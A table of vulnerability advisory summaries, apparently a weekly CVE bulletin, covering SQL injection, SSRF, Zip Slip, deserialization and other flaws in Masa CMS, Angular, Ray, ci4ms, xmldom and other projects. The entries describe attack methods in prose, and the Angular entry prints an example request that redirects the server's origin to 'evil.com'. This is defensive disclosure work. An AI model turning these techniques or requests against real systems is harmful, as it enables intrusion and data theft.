| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the createBundle method in `csettings.cfc` does not properly validate anti-CSRF tokens for site bundle creation requests. An attacker can craft a malicious webpage or link that, when visited by a logged-in administrator, triggers the silent creation of a comprehensive site bundle. This bundle is saved to a predictable, publicly accessible web directory. An unauthenticated attacker can then retrieve the bundle and obtain site content, user account data, password hashes, form submissions, email lists, plugins, and configuration data. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, remove unexpected bundle files from public directories, restrict access to the affected endpoint, and limit exposure of administrative sessions. | 2026-05-06 | not yet calculated | CVE-2026-40326 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-622v-h7vf-w4gm |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.5.2 and earlier, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's processing of the sortBy parameter. The application fails to properly sanitize or parameterize this input before incorporating it into dynamic SQL statements. An unauthenticated remote attacker can execute arbitrary SQL commands against the database, potentially gaining access to sensitive data, modifying or deleting records, or escalating privileges to administrative control. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, configure WAF rules to block malicious SQL patterns in the sortBy parameter sent to beanFeed.cfc. | 2026-05-05 | not yet calculated | CVE-2026-40329 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-3xpq-q494-8qq4 |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, a SQL injection vulnerability exists in the beanFeed.cfc component within the getQuery function's handling of the sortDirection parameter. The parameter value is concatenated directly into SQL queries without sanitization or parameterization. An unauthenticated remote attacker can exploit this to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the underlying database server. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, use a WAF to block or restrict access to the beanFeed.cfc component, or deploy rules to detect SQL injection patterns targeting the sortDirection parameter. | 2026-05-05 | not yet calculated | CVE-2026-40330 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-56cc-gxfr-hqp8 |
| MasaCMS--MasaCMS | Masa CMS is an open source content management system. In versions 7.2.0 through 7.2.9, 7.3.0 through 7.3.14, 7.4.0 through 7.4.9, and 7.5.0 through 7.5.2, the unauthenticated JSON API accepts an altTable parameter that is stored via the setAltTable() method without validation or sanitization. This value is injected directly into a SQL FROM clause within feedGateway.cfc. An unauthenticated attacker can pass an arbitrary subquery into the altTable parameter to read sensitive data from any table in the database in a single HTTP request, including administrative credentials and password reset tokens. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, apply validation to the setAltTable function in core/mura/content/feed/feedBean.cfc to restrict input to simple alphanumeric table names, or disable the JSON API if it is not required. | 2026-05-05 | not yet calculated | CVE-2026-40331 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-jphh-r686-6w7j |
| MasaCMS--MasaCMS | Masa CMS is affected by an Open Redirect vulnerability due to improper handling of scheme-relative URLs. The application incorrectly interprets paths beginning with double slashes (//) as internal paths, failing to validate the redirect target before processing. The application treats these values as internal paths and processes them without confirming that the redirect target remains on the local site. An attacker can craft a URL on the trusted Masa CMS domain that redirects a victim to an external attacker-controlled site. This can be used for phishing and, in some authentication flows, may expose tokens or other sensitive data to the external site. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, reject or rewrite redirect parameters that begin with // and consider disabling forceDirectoryStructure if compatible with the deployment. | 2026-05-06 | not yet calculated | CVE-2026-40332 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-xw99-h3mw-wj47 |
| KAZEBURO--Gazelle | Gazelle versions through 0.49 for Perl allows HTTP Request Smuggling via Improper Header Precedence. Gazelle incorrectly prioritizes "Content-Length" over "Transfer-Encoding: chunked" when both headers are present in an HTTP request. Per RFC 7230 3.3.3, Transfer-Encoding must take precedence. An attacker could exploit this to smuggle malicious HTTP requests via a front-end reverse proxy. | 2026-05-06 | not yet calculated | CVE-2026-40562 | https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.3 https://security.metacpan.org/patches/G/Gazelle/0.49/CVE-2026-40562-r1.patch https://metacpan.org/release/KAZEBURO/Gazelle-0.50/changes |
| Apache Software Foundation--Apache Atlas | Description: Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Atlas Apache Atlas exposes a DSL search endpoint that accepts user-supplied query strings. Attacker can alter Gremlin traversal logic within grammar-allowed characters to access unintended data Affect Version: This issue affects Apache Atlas: from 0.8 through 2.4.0. For the affect version >= 2.0, vulnerability is only when Atlas is deployed with below non-default configuration. atlas.dsl.executor.traversal=false Mitigation: Users are recommended to upgrade to version 2.5.0, which fixes the issue. | 2026-05-04 | not yet calculated | CVE-2026-40563 | https://lists.apache.org/thread/vd0oggmqxl2k1skm0z2f9p0plx7jhmfl |
| Apache Software Foundation--Apache OpenNLP | XML External Entity (XXE) via Unsanitized Dictionary Parsing in Apache OpenNLP DictionaryEntryPersistor Versions Affected: before 2.5.9, before 3.0.0-M3 Description: The DictionaryEntryPersistor class initializes a static SAXParserFactory at class-load time without enabling FEATURE_SECURE_PROCESSING or disabling DTD processing. When create(InputStream, EntryInserter) is invoked, the only feature set on the XMLReader is namespace support - external entity resolution and DOCTYPE declarations remain fully enabled. An attacker who can supply a crafted dictionary file (e.g., a stop-word list or domain dictionary) containing a malicious DOCTYPE declaration can trigger local file disclosure via file:// entity references or server-side request forgery via http:// entity references during SAX parsing, before the application processes a single dictionary entry. This is inconsistent with the project's own XmlUtil.createSaxParser() helper, which correctly sets FEATURE_SECURE_PROCESSING and disallow-doctype-decl and is used by all other XML parsing paths in the codebase. The public Dictionary(InputStream) constructor delegates directly to this method and is the documented API for loading user-supplied dictionaries, making untrusted input a realistic scenario. Mitigation: 2.x users should upgrade to 2.5.9. 3.x users should upgrade to 3.0.0-M3. Users who cannot upgrade immediately should ensure that all dictionary files are sourced from trusted origins and should consider wrapping the Dictionary(InputStream) constructor with input validation that rejects any XML containing a DOCTYPE declaration before it reaches the parser. | 2026-05-04 | not yet calculated | CVE-2026-40682 | https://lists.apache.org/thread/r6jpt0qr9nj67gqhppqg7jxf8vsbo0w6 |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, the secret used to sign authentication cookies is persisted to a static file at ~/.local/share/jupyter/runtime/jupyter_cookie_secret and is never rotated when a user changes their password. After a password reset and server restart, any previously issued authentication cookie remains cryptographically valid because the signing key has not changed. An attacker who has captured a session cookie through any means retains full authenticated access to the server regardless of subsequent password changes. This affects deployments using password-based authentication, particularly shared or public-facing servers where credential rotation is expected to revoke existing sessions. This issue has been fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2026-40934 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5mrq-x3x5-8v8f |
| josdejong--mathjs | Math.js is an extensive math library for JavaScript and Node.js. From version 13.1.0 to before version 15.2.0, arbitrary JavaScript can be executed via the expression parser of mathjs. This issue has been patched in version 15.2.0. | 2026-05-07 | not yet calculated | CVE-2026-41139 | https://github.com/josdejong/mathjs/security/advisories/GHSA-5v89-rwgr-qj6g https://github.com/josdejong/mathjs/pull/3656 https://github.com/josdejong/mathjs/commit/0aee2f61866e35ffa0aef915221cdf6b026ffdd4 https://github.com/josdejong/mathjs/commit/bcf0da46f0b8577ec03c9ecd7bff8b5c2543a611 https://github.com/josdejong/mathjs/releases/tag/v15.2.0 |
| Sync-in--server | Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0. | 2026-05-08 | not yet calculated | CVE-2026-41161 | https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5 https://github.com/Sync-in/server/releases/tag/v2.2.0 |
| containers--bubblewrap | bubblewrap is a low-level unprivileged sandboxing tool. From version 0.11.0 to before version 0.11.2, if bubblewrap is installed in setuid mode then the user can use ptrace to attach to bubblewrap and control the unprivileged part of the sandbox setup phase. This allows the attacker to arbitrarily use the privileged operations, and in particular the "overlay mount" operation, allowing the creation of overlay mounts which is otherwise not allowed in the setuid version of bubblewrap. This issue has been patched in version 0.11.2. | 2026-05-09 | not yet calculated | CVE-2026-41163 | https://github.com/containers/bubblewrap/security/advisories/GHSA-xq78-7hw4-5jvp https://github.com/containers/bubblewrap/releases/tag/v0.11.2 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.5.0, ci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root. This issue has been patched in version 0.31.5.0. | 2026-05-07 | not yet calculated | CVE-2026-41202 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.5.0, ci4ms Theme::upload extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the theme create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root. This issue has been patched in version 0.31.5.0. | 2026-05-07 | not yet calculated | CVE-2026-41203 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| WatchGuard Technologies--WatchGuard Agent | Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service. | 2026-05-06 | not yet calculated | CVE-2026-41286 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00011 |
| WatchGuard--WatchGuard Agent | Stack-based Buffer Overflow vulnerability in the WatchGuard Agent discovery service on Windows allows Overflow Buffers. An unauthenticated attacker on the same local network could exploit this vulnerability to crash the agent service. | 2026-05-06 | not yet calculated | CVE-2026-41287 | https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2026-00010 |
| WatchGuard--WatchGuard Agent | Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\\SYSTEM. | 2026-05-06 | not yet calculated | CVE-2026-41288 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011 |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8, a Server-Side Request Forgery (SSRF) vulnerability exists in @angular/platform-server due to improper handling of URLs during Server-Side Rendering (SSR). When an attacker sends a request such as GET /\evil.com/ HTTP/1.1 the server engine (Express, etc.) passes the URL string to Angular's rendering functions. Because the URL parser normalizes the backslash to a forward slash for HTTP/HTTPS schemes, the internal state of the application is hijacked to believe the current origin is evil.com. This misinterpretation tricks the application into treating the attacker's domain as the local origin. Consequently, any relative HttpClient requests or PlatformLocation.hostname references are redirected to the attacker controlled server, potentially exposing internal APIs or metadata services. This issue has been patched in versions 19.2.21, 20.3.19, 21.2.9, and 22.0.0-next.8. | 2026-05-08 | not yet calculated | CVE-2026-41423 | https://github.com/angular/angular/security/advisories/GHSA-45q2-gjvg-7973 https://github.com/angular/angular/pull/68194 https://github.com/angular/angular/commit/ede7c58a2aa13fdccc8f0b67ce93ba1c11749412 |
| ray-project--ray | Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0. | 2026-05-08 | not yet calculated | CVE-2026-41486 | https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r https://github.com/ray-project/ray/pull/62056 https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f https://github.com/ray-project/ray/releases/tag/ray-2.55.0 |
| langfuse--langfuse | Langfuse is an open source large language model engineering platform. From version 3.68.0 to before version 3.167.0, there is a role-based-access control flaw in the LLM connection update flow. An authenticated, low-privileged user of role "member" in a project could request the update of an existing LLM connection to an attacker-controlled baseUrl, causing Langfuse to reuse the stored provider secret and redirect the test request to an attacker-controlled endpoint. This could expose the plaintext provider LLM API key for that connection. The attack is only possible if a user is already part of a project and has "member" scoped access. This issue has been patched in version 3.167.0. | 2026-05-08 | not yet calculated | CVE-2026-41487 | https://github.com/langfuse/langfuse/security/advisories/GHSA-2524-j966-gfgh https://github.com/langfuse/langfuse/pull/13027 https://github.com/langfuse/langfuse/pull/13055 https://github.com/langfuse/langfuse/commit/7527bb0d84bc0a3dc24a4b16d22ed2e46e6dddff https://github.com/langfuse/langfuse/commit/e12386f9d4368bbfff24a4ad7fd53641091605ff https://github.com/langfuse/langfuse/releases/tag/v3.167.0 |
| lsegal--yard | YARD is a Ruby Documentation tool. Prior to version 0.9.42, a path traversal vulnerability was discovered in YARD when using yard server to serve documentation. This bug would allow unsanitized HTTP requests to access arbitrary files on the machine of a yard server host under certain conditions. This issue has been patched in version 0.9.42. | 2026-05-08 | not yet calculated | CVE-2026-41493 | https://github.com/lsegal/yard/security/advisories/GHSA-3jfp-46x4-xgfj https://github.com/lsegal/yard/releases/tag/v0.9.42 |
| CROSS-signature--CROSS-implementation | CROSS implementation contains reference and optimized implementations of the CROSS post-quantum signature algorithm. Prior to commit fc6b7e7, there is a buffer overflow in crypto_sign_open() caused by an underflow of the integer mlen. This issue has been patched via commit fc6b7e7. | 2026-05-08 | not yet calculated | CVE-2026-41509 | https://github.com/CROSS-signature/CROSS-implementation/security/advisories/GHSA-w72c-hgx8-p7cv https://github.com/CROSS-signature/CROSS-implementation/commit/fc6b7e78cdf789bb5c395a81dc601356f1383da0 |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, insecure plugin upload functionality allows attackers to upload and execute arbitrary PHP code, leading to complete server compromise and persistent backdoor installation. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-41517 | https://github.com/emlog/emlog/security/advisories/GHSA-8qwx-6jx6-94x4 |
| nhost--nhost | Nhost is an open source Firebase alternative with GraphQL. Prior to version 0.49.1, Nhost automatically links an incoming OAuth identity to an existing Nhost account when the email addresses match. This is only safe when the email has been verified by the OAuth provider. Nhost's controller trusts a profile.EmailVerified boolean that is set by each provider adapter. The vulnerability is that several provider adapters do not correctly populate this field they either silently drop a verified field the provider API actually returns (Discord), or they fall back to accepting unconfirmed emails and marking them as verified (Bitbucket). Two Microsoft providers (AzureAD, EntraID) derive the email from non-ownership-proving fields like the user principal name, then mark it verified. The result is that an attacker can present an email they don't own to Nhost, have the OAuth identity merged into the victim's account, and receive a full authenticated session. This issue has been patched in version 0.49.1. | 2026-05-08 | not yet calculated | CVE-2026-41574 | https://github.com/nhost/nhost/security/advisories/GHSA-6g38-8j4p-j3pr https://github.com/nhost/nhost/pull/4162 https://github.com/nhost/nhost/commit/ec8dab3f2cf46e1131ddaf893d56c37aa00380b2 https://github.com/nhost/nhost/releases/tag/auth%400.49.1 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-script version 5.0.2, after a refactoring, Zebra failed to validate a consensus rule that restricted the possible values of sighash hash types for V5 transactions which were enabled in the NU5 network upgrade. Zebra nodes could thus accept and eventually mine a block that would be considered invalid by zcashd nodes, creating a consensus split between Zebra and zcashd nodes. In a similar vein, for V4 transactions, Zebra mistakenly used the "canonical" hash type when computing the sighash while zcashd (correctly per the spec) uses the raw value, which could also crate a consensus split. This issue has been patched in zebrad version 4.3.1 and zebra-script version 5.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41583 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-8m29-fpq5-89jj |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain a rk field which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a "zero" value), however, the orchard crate which is used to verify Orchard proofs would panic when fed a rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41584 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-452v-w3gx-72wg |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. From zebrad versions 2.2.0 to before 4.3.1 and from zebra-rpc versions 1.0.0-beta.45 to before 6.0.2, a vulnerability in Zebra's JSON-RPC HTTP middleware allows an authenticated RPC client to cause a Zebra node to crash by disconnecting before the request body is fully received. The node treats the failure to read the HTTP request body as an unrecoverable error and aborts the process instead of returning an error response. This issue has been patched in zebrad version 4.3.1 and zebra-rpc version 6.0.2. | 2026-05-08 | not yet calculated | CVE-2026-41585 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-29x4-r6jv-ff4w |
| hyperledger--fabric | Hyperledger Fabric is an enterprise-grade permissioned distributed ledger framework for developing solutions and applications. From versions 1.0.0 to 2.2.26, Channel.java implements readObject() and exposes deSerializeChannel() which call ObjectInputStream.readObject() on untrusted byte arrays without configuring an ObjectInputFilter. This is a classic Java deserialization RCE pattern. At time of publication, there are no publicly available patches. | 2026-05-07 | not yet calculated | CVE-2026-41586 | https://github.com/hyperledger/fabric/security/advisories/GHSA-prf8-cf2x-rhx7 https://hyperledger.github.io/fabric-gateway |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.26.0.0 to before version 0.31.7.0, a theme upload feature allows any authenticated backend user with theme-upload permission to achieve remote code execution (RCE) by uploading a crafted ZIP file. PHP files inside the ZIP are installed into the web-accessible public/ directory with no extension or content filtering, making them directly executable via HTTP. This issue has been patched in version 0.31.7.0. | 2026-05-07 | not yet calculated | CVE-2026-41587 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fw49-9xq4-gmx6 https://github.com/ci4-cms-erp/ci4ms/commit/b969465e71eacd9eb57014ad1fce1fc34fa7bca0 |
| monetr--monetr | monetr is a budgeting application for recurring expenses. Prior to version 1.12.5, a server-side request forgery (SSRF) vulnerability in monetr's Lunch Flow integration allowed any authenticated user on a self-hosted instance to cause the monetr server to issue HTTP GET requests to arbitrary URLs supplied by the caller, with the response body from non-200 upstream responses reflected back in the API error message. This issue has been patched in version 1.12.5. | 2026-05-07 | not yet calculated | CVE-2026-41644 | https://github.com/monetr/monetr/security/advisories/GHSA-29v9-frvh-c426 https://github.com/monetr/monetr/pull/3122 https://github.com/monetr/monetr/commit/c260caa3c573a4a396ec2d264c7641a5d958385b https://github.com/monetr/monetr/releases/tag/v1.12.5 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, user provided image and backup tarballs would be unpacked and YAML files parsed without any size restrictions. This was making it easy for an authenticated user to provide a crafted image or backup tarball that when parsed by Incus would lead to a very large YAML document being loaded into memory, potentially causing the entire server to run out of memory. This issue has been patched in version 7.0.0. | 2026-05-07 | not yet calculated | CVE-2026-41648 | https://github.com/lxc/incus/security/advisories/GHSA-67wx-r9xr-x75x https://github.com/lxc/incus/releases/tag/v7.0.0 |
| alam00000--bentopdf | BentoPDF is a client-side PDF toolkit that is self hostable. Prior to version 2.8.3, a cross-site scripting vulnerability was identified in BentoPD. An attacker may be able to execute arbitrary JavaScript in certain circumstances in Markdown to PDF Tool. This issue has been patched in version 2.8.3. | 2026-05-07 | not yet calculated | CVE-2026-41653 | https://github.com/alam00000/bentopdf/security/advisories/GHSA-6vh8-4frx-647f https://github.com/alam00000/bentopdf/releases/tag/v2.8.3 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, an authenticated user with project.add permission (default on hosted Weblate SaaS and for any user holding an active billing/trial plan) can import a crafted project backup ZIP whose components/<name>.json contains an attacker-chosen repo URL pointing at a private address (e.g. http://127.0.0.1:9999/) or using a non-allow-listed scheme (e.g. file://, git://). Weblate persists the component via Component.objects.bulk_create([component])[0], which bypasses Django's full_clean() and therefore never runs the validate_repo_url validator. The URL is subsequently written verbatim into .git/config by configure_repo(pull=False). This issue has been patched in version 5.17.1. | 2026-05-07 | not yet calculated | CVE-2026-41654 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-cwcx-382v-8m9g https://github.com/WeblateOrg/weblate/pull/19061 https://github.com/WeblateOrg/weblate/pull/19062 https://github.com/WeblateOrg/weblate/commit/e1eff1f517c1ee315d69581910baaabb724e5ef0 https://github.com/WeblateOrg/weblate/commit/e4b67a76d95d5165ecb9937f7485fd79223b7f14 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment-breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41672 | https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8 https://github.com/xmldom/xmldom/pull/987 https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7 https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, seven recursive traversals in lib/dom.js operate without a depth limit. A sufficiently deeply nested DOM tree causes a RangeError: Maximum call stack size exceeded, crashing the application. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41673 | https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597 https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3 https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112 https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41674 | https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| xmldom--xmldom | xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In @xmldom/xmldom prior to versions 0.9.10 and 0.8.13 and xmldom version 0.6.0 and prior, the package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence ?>. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output. This issue has been patched in versions @xmldom/xmldom versions 0.9.10 and 0.8.13. | 2026-05-07 | not yet calculated | CVE-2026-41675 | https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2 https://github.com/xmldom/xmldom/releases/tag/0.8.13 https://github.com/xmldom/xmldom/releases/tag/0.9.10 |
| pupnp--pupnp | pupnp is an SDK for development of UPnP device and control point applications. Prior to version 1.18.5, pupnp is vulnerable to SRRF port confusion due to port truncation via atoi() cast in parse_uri(). This issue has been patched in version 1.18.5. | 2026-05-08 | not yet calculated | CVE-2026-41682 | https://github.com/pupnp/pupnp/security/advisories/GHSA-q522-6w45-4j58 https://github.com/pupnp/pupnp/commit/def5f9a2bc42f5b3d713e37c516fbe840ce54b7b https://github.com/pupnp/pupnp/releases/tag/release-1.18.5 |
| anthropics--anthropic-sdk-typescript | Claude SDK for TypeScript provides access to the Claude API from server-side TypeScript or JavaScript applications. From version 0.79.0 to before version 0.91.1, the BetaLocalFilesystemMemoryTool in the Anthropic TypeScript SDK created memory files and directories using the Node.js default modes (0o666 for files, 0o777 for directories), leaving them world-readable on systems with a standard umask and world-writable in environments with a permissive umask such as many Docker base images. A local attacker on a shared host could read persisted agent state, and in containerized deployments could modify memory files to influence subsequent model behavior. This issue has been patched in version 0.91.1. | 2026-05-04 | not yet calculated | CVE-2026-41686 | https://github.com/anthropics/anthropic-sdk-typescript/security/advisories/GHSA-p7fg-763f-g4gf |
| jackc--pgx | pgx is a PostgreSQL driver and toolkit for Go. Prior to version 5.9.2, SQL injection can occur when the non-default simple protocol is used, a dollar quoted string literal is used in the SQL query, that string literal contains text that would be would be interpreted as a placeholder outside of a string literal, and the value of that placeholder is controllable by the attacker. This issue has been patched in version 5.9.2. | 2026-05-08 | not yet calculated | CVE-2026-41889 | https://github.com/jackc/pgx/security/advisories/GHSA-j88v-2chj-qfwx https://github.com/jackc/pgx/commit/60644f84918a8af66d14a4b0d865d4edafd955da https://github.com/jackc/pgx/releases/tag/v5.9.2 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.31.1.0 to before version 0.31.8.0, the deleteProcess() action accepts a POST parameter tables[] containing arbitrary table names. These are passed directly to $forge->dropTable() without validating that the tables belong to the theme being deleted. The deleteConfirm view correctly populates tables[] from the theme's own migration files, but the server-side deleteProcess does not verify the received values against those files. An authenticated admin can craft a POST request with arbitrary table names and drop any table in the database. This issue has been patched in version 0.31.8.0. | 2026-05-07 | not yet calculated | CVE-2026-41890 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vgrf-pr28-vf98 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.8.0 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. From version 0.26.0 to before version 0.31.8.0, the auth filter has the deactivated/banned user check commented out. This issue has been patched in version 0.31.8.0. | 2026-05-07 | not yet calculated | CVE-2026-41891 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-5hfv-c864-qcq9 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.8.0 |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. Prior to version 2.25.0, the HTTP login endpoints (POST /login and POST /signalk/v1/auth/login) are protected by express-rate-limit (default: 100 attempts per 10-minute window, configurable via HTTP_RATE_LIMITS). The WebSocket login path - sending {login: {username, password}} messages over an established WebSocket connection - calls app.securityStrategy.login() directly without any rate limiting. An attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds). This issue has been patched in version 2.25.0. | 2026-05-09 | not yet calculated | CVE-2026-41893 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-vmfm-ch9h-5c7g https://github.com/SignalK/signalk-server/pull/2568 https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d https://github.com/SignalK/signalk-server/releases/tag/v2.25.0 |
